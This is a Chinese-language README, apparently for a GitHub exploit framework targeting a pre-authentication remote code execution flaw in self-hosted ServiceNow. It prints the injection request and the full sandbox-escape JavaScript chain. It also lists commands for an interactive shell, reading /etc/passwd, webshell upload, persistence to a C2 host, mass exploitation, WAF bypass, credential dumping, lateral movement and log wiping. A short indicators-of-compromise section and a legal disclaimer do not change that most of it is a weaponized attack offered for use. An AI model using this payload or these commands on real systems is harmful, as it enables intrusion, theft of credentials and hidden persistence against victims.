CVE-2026-6875 ServiceNow 预认证 RCE 框架 🔥 JS 注入 → 沙箱逃逸 → RCE → Root。功能:--detect、--exec、反弹/交互式 shell、批量线程、WAF 绕过、持久化、横向移动、凭据转储、无文件执行、清除痕迹。🛡️ CVSS 9.5 已被积极利用。仅限授权与合法使用。保持合法。🔒

漏洞利用框架与安全验证器
仅供授权安全测试使用。
本工具仅供教育和授权渗透测试目的使用。
作者和贡献者不对因使用本软件而造成的任何滥用或损害负责。用户须自行确保在测试前已获得目标所有者的明确书面许可。根据《计算机欺诈与滥用法》(CFAA)及全球类似法律,未经授权访问计算机系统属于违法行为。
使用本软件即表示您同意:
⚠️ 警告: 该漏洞正在被野外积极利用。未经授权的使用可能导致严重的法律后果。
CVE-2026-6875 是 ServiceNow AI 平台(原 Now Platform)中的一个严重 未认证远程代码执行(RCE) 漏洞。攻击者可借此绕过脚本沙箱,并以 ServiceNow 应用程序的权限执行任意系统命令。
JavaScript 注入: assessment_thanks.do 端点接受 sysparm_assessable_type 参数。攻击者通过在值前添加 javascript: 前缀来注入任意 JavaScript 代码。
沙箱逃逸: 一个复杂的沙箱逃逸小工具(链式利用 DiscoveryFunctions.getCacheObjectForTable、AbstractAjaxProcessor 和 Class.create)解除 JavaScript 沙箱限制。
远程代码执行: 注入的 Java 代码(通过 java.lang.Runtime.exec())以 ServiceNow 应用程序权限运行,从而实现完整的系统入侵。
权限提升: 利用后模块尝试通过 sudo 错误配置、SUID 二进制文件、可写的 cron 任务或内核漏洞利用提升至 root 权限。
exploit.py)完整武器化漏洞利用 将 JavaScript 注入与沙箱逃逸链式结合以实现远程代码执行,并配备用于持久化、横向移动和凭据转储的高级利用后模块。
verifier.py)安全验证器 执行非侵入式漏洞检测,既不执行有害载荷,也不更改系统。
pip(用于 requests 库)pip install requests urllib3
[!NOTE]
exploit.py的核心功能仅使用标准库;requests仅用于--detect功能、--webhook通知和安全验证器。
verifier.py)# Single target verification
python verifier.py -u 192.168.1.100
# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow
# Mass scan from file
python verifier.py -l targets.txt -o results.json
# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q
# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60
# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"
# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc
# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp
# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444
# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean
# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090
# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass
# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow
# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls
# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0
⚠️ 重要提示: ServiceNow Cloud 实例会自动修补。此漏洞主要影响 自托管 部署。
该漏洞位于 assessment_thanks.do 端点中,该端点接受 sysparm_assessable_type 参数。通过提供以 javascript: 开头的值,平台会在系统上下文中执行后续的 JavaScript。
易受攻击的端点:
POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')
注入的代码最初被限制在沙箱中。然而,通过利用以下链:
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);
沙箱被绕过,从而获得对 java.lang.Runtime 等 Java 类的完全访问权限。
搜索 .properties、.xml、.conf 文件中的密码、API 密钥和机密信息:
/opt/ServiceNow/conf/*.xml/var/log/ServiceNow/*.log/etc/passwd、/etc/shadow通过以下方式安装后门:
*/5 * * * *)、systemd 服务、SSH 密钥schtasks)、注册表运行键扫描本地子网中的其他 ServiceNow 实例或 SSH 主机,并复用以发现的凭据。
即时编译 Java 类,通过 ClassLoader 加载并在内存中执行(不写入磁盘)。
{/*comment*/})\u0077 表示 w)ne\u0077 表示 new)在您的 ServiceNow 日志中搜索:
extraweb_access.log – 对 /assessment_thanks.do 的请求,其中 sysparm_assessable_type 包含:
javascript:DiscoveryFunctions.getCacheObjectForTableAbstractAjaxProcessor/var/tmp/ 中的意外文件(例如 shell.jsp、.sh 脚本)/etc/passwd、/etc/shadow 或 ~/.ssh/authorized_keyscrontab -l)/etc/systemd/system/)/bin/bash -i、nc、curl、wget、python -c)[+] CVE-2026-15409/15410 - SonicWall SMA1000 多漏洞利用框架
https://github.com/tc4dy/CVE-2026-15409-15410-Framework
[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender 本地权限提升
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
[+] CVE-2026-57821 - Apache Fineract SQL 注入工具包
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit
[+] CVE-2026-41940 - cPanel/WHM 认证绕过
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit
| 属性 | 值 |
|---|
| 📅 发现时间 | 2026 年 4 月 1 日(Searchlight Cyber) |
| ⚠️ CVSS 评分 | 9.5(严重) |
| 📋 CISA KEV | 2026 年 7 月 13 日添加 |
| 🎯 受影响产品 | 自托管 ServiceNow AI 平台 |
| 🔄 修复版本 | Brazil EA/GA、Australia Patch 2、Zurich Patch 7b/9、Yokohama Patch 12 Hot Fix 1b/13 |
| 🔓 认证要求 | 无需认证(预认证) |
| 🌍 活跃利用 | 已在野外确认(2026 年 7 月) |
| 功能 | 描述 |
|---|
| 🚀 JavaScript 注入 | 通过 sysparm_assessable_type 参数注入载荷。 |
| 💻 沙箱逃逸 | 绕过 ServiceNow 脚本沙箱以运行任意 Java 代码。 |
| 🔐 交互式 Shell | 生成实时 shell,支持多条命令。 |
| 👑 Root 提权 | 检查 sudo 错误配置、SUID 二进制文件和 cron 任务。 |
| 📁 文件操作 | 上传 WebShell,通过 base64 编码读取/下载文件。 |
| 🌐 批量扫描 | 使用多线程批量利用多个目标(-l 参数)。 |
| 🎯 安全检测 | 可选的 --detect 参数,用于非侵入式漏洞验证。 |
| ⚙️ WAF 绕过 | 内置混淆技术以绕过 WAF/IDS(6 种技术)。 |
| 🧩 持久化 | 安装 cron/systemd/schtasks 后门。 |
| 🔍 横向移动 | 扫描本地网络中的其他易受攻击主机,并尝试通过 SSH/SSRF 传播。 |
| 🧹 痕迹清理 | 删除日志、bash 历史记录和审计痕迹。 |
| 💾 无文件执行 | 使用 Java ClassLoader 在内存中运行载荷,无需写入磁盘。 |
| 🔌 回调服务器 | 内置 HTTP 服务器,用于接收命令输出(可选)。 |
| 📢 Webhook 通知 | 将结果发送到自定义 URL(Slack、Discord 等)。 |
| 🪟 跨平台 | 支持 Linux 和 Windows 目标(cmd.exe / PowerShell)。 |
| 🔒 线程安全 | 使用锁机制实现并发操作安全。 |
| 📊 版本检测 | 检测 ServiceNow 版本(Zurich/Brazil/Australia/Yokohama)。 |
| 命令 | 描述 |
|---|
exec <cmd> | 执行系统命令 |
upload <local> [remote] | 将 WebShell 上传到目标 |
download <remote> | 下载并显示文件内容 |
privesc | 尝试权限提升 |
reverse <host> <port> | 发送反向 Shell |
dumpcred | 从 ServiceNow 配置中转储凭据 |
persist <host> <port> | 安装持久化(cron/systemd/schtasks) |
lateral | 尝试横向移动 |
clean | 清理痕迹(日志、历史记录) |
memory <host> <port> | 执行无文件 Java 载荷 |
exit | 退出交互式 Shell |
| 功能 | 描述 |
|---|
| 🔍 ServiceNow 检测 | 通过多个端点识别 ServiceNow 实例。 |
| 📊 版本检测 | 检测具体的 ServiceNow 版本和补丁级别。 |
| 🧪 JavaScript 注入测试 | 使用安全的 gs.print() 载荷测试注入漏洞。 |
| 🔒 沙箱逃逸测试 | 在不执行破坏性命令的情况下验证沙箱逃逸。 |
| 📈 置信度评分 | 基于证据提供置信度百分比(85‑95%)。 |
| 📋 JSON 输出 | 将结果导出为 JSON 格式以便报告。 |
| 🔄 批量扫描 | 支持多线程扫描多个目标。 |
| 🎯 非侵入式 | 仅执行无害的 uname -a 获取系统信息。 |
| ServiceNow 版本 | 受影响版本 | 修复版本 |
|---|
| Brazil | EA、GA | 已修补(GA 之后) |
| Australia | Patch 2 之前 | Patch 2+ |
| Zurich | Patch 7b、Patch 9 之前 | Patch 7b、Patch 9+ |
| Yokohama | Patch 12 Hot Fix 1b 之前 | Patch 12 Hot Fix 1b、Patch 13 |
| 其他版本 | 未知 | 请查看官方公告 |